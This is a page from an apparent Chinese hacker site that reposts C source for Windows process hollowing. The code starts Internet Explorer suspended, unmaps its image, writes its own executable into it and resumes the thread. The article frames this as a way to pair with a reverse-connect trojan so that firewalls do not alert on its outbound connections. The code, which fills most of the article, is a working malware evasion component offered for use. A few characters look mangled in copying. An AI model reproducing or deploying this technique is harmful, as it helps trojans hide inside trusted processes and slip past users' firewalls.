 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 绕过防火墙的反向连接报警 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2006-12-14  |
|||||
|
Author: Polymorphours Date: 2005/1/10 另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的 反向连接报警。 */ #include <stdio.h> #include <windows.h> // // ntdll.lib ( 来自DDK 2000 ) // #pragma comment(lib,"ntdll.lib") typedef long NTSTATUS; NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress ); typedef struct _ChildProcessInfo { DWORD dwBaseAddress; DWORD dwReserve; } CHILDPROCESS, *PCHILDPROCESS; BOOL FindIePath( char *IePath, int *dwBuffSize ); BOOL InjectProcess(void); DWORD GetSelfImageSize( HMODULE hModule ); BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess ); char szIePath[MAX_PATH]; int main(void) { if (InjectProcess() ) { printf("This is my a test code,made by (Polymorphours)shadow3.\r\n"); } else { MessageBox(NULL,"进程插入完成","Text",MB_OK); } return 0; } BOOL FindIePath( char *IePath, int *dwBuffSize ) { char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir,MAX_PATH); szSystemDir[2] = '\0' lstrcat(szSystemDir,"\\Program Files\\Internet Explorer\\iexplore.exe"); lstrcpy(IePath, szSystemDir); return TRUE; } BOOL InjectProcess(void) { char szModulePath[MAX_PATH]; DWORD dwImageSize = 0; STARTUPINFO si = {0}; PROCESS_INFORMATION pi; CONTEXT ThreadCxt; DWORD *PPEB; DWORD dwWrite = 0; CHILDPROCESS stChildProcess; LPVOID lpVirtual = NULL; PIMAGE_DOS_HEADER pDosheader = NULL; PIMAGE_NT_HEADERS pVirPeHead = NULL; HMODULE hModule = NULL; ZeroMemory( szModulePath, MAX_PATH ); ZeroMemory( szIePath, MAX_PATH ); GetModuleFileName( NULL, szModulePath, MAX_PATH ); FindIePath( szIePath, NULL ); if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) { return FALSE; } hModule = GetModuleHandle( NULL ); if ( hModule == NULL ) { return FALSE; } pDosheader = (PIMAGE_DOS_HEADER)hModule; pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew); dwImageSize = GetSelfImageSize(hModule); // // 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程 // if ( CreateInjectProcess( &pi, &ThreadCxt , &stChildProcess ) ) { printf("CHILD PID: [%d]\r\n",pi.dwProcessId); // // 卸载需要注入进程中的代码 // if ( ZwUnmapViewOfSection( pi.hProcess, (LPVOID)stChildProcess.dwBaseAddress ) == 0 ) { // // 重新分配内存 // lpVirtual = VirtualAllocEx( pi.hProcess, (LPVOID)hModule, dwImageSize, MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if ( lpVirtual ) { printf("Unmapped and Allocated Mem Success.\r\n"); } } else { printf("ZwUnmapViewOfSection() failed.\r\n"); return TRUE; } if ( lpVirtual ) { PPEB = (DWORD *)ThreadCxt.Ebx; // // 重写装载地址 // WriteProcessMemory( pi.hProcess, &PPEB[2], &lpVirtual, sizeof(DWORD), &dwWrite ); // // 写入自己进程的代码到目标进程 // if ( WriteProcessMemory( pi.hProcess, lpVirtual, hModule, dwImageSize, &dwWrite) ) { printf("image inject into process success.\r\n"); ThreadCxt.ContextFlags = CONTEXT_FULL; if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ) { ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint; } else { ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint; } #ifdef DEBUG printf("EAX = [0x%08x]\r\n",ThreadCxt.Eax); printf("EBX = [0x%08x]\r\n",ThreadCxt.Ebx); printf("ECX = [0x%08x]\r\n",ThreadCxt.Ecx); printf("EDX = [0x%08x]\r\n",ThreadCxt.Edx); printf("EIP = [0x%08x]\r\n",ThreadCxt.Eip); #endif SetThreadContext(pi.hThread, &ThreadCxt); ResumeThread(pi.hThread); } else { printf("WirteMemory Failed,code:%d\r\n",GetLastError()); TerminateProcess(pi.hProcess, 0); } } else { printf("VirtualMemory Failed,code:%d\r\n",GetLastError()); TerminateProcess(pi.hProcess, 0); } } return TRUE; } DWORD GetSelfImageSize( HMODULE hModule ) { DWORD dwImageSize; _asm { mov ecx,0x30 mov eax, fs:[ecx] mov eax, [eax + 0x0c] mov esi, [eax + 0x0c] add esi,0x20 lodsd mov dwImageSize,eax } return dwImageSize; } BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess ) { STARTUPINFO si = {0}; DWORD *PPEB; DWORD read; // 使用挂起模式启动ie if( CreateProcess( NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi ) ) { pThreadCxt->ContextFlags = CONTEXT_FULL; GetThreadContext(pi->hThread, pThreadCxt); PPEB = (DWORD *)pThreadCxt->Ebx; // 得到ie的装载基地址 ReadProcessMemory( pi->hProcess, &PPEB[2], (LPVOID)&(pChildProcess->dwBaseAddress), sizeof(DWORD), &read ); return TRUE ; } return FALSE; } Whitecell Security Systems,一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 防火墙技术详细说明及技术发 防火墙技术详细说明及技术发 防火墙技术详细说明及技术发 防火墙技术详细说明及技术发 ZoneAlarm防火墙产品有多个本 电影“防火墙”引发黑客攻击 为销售防火墙变身黑客攻击客 拒绝威胁 教你如何合理高效配 杀毒软件网络防火墙一个都不 拒绝威胁 教你如何合理高效配 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
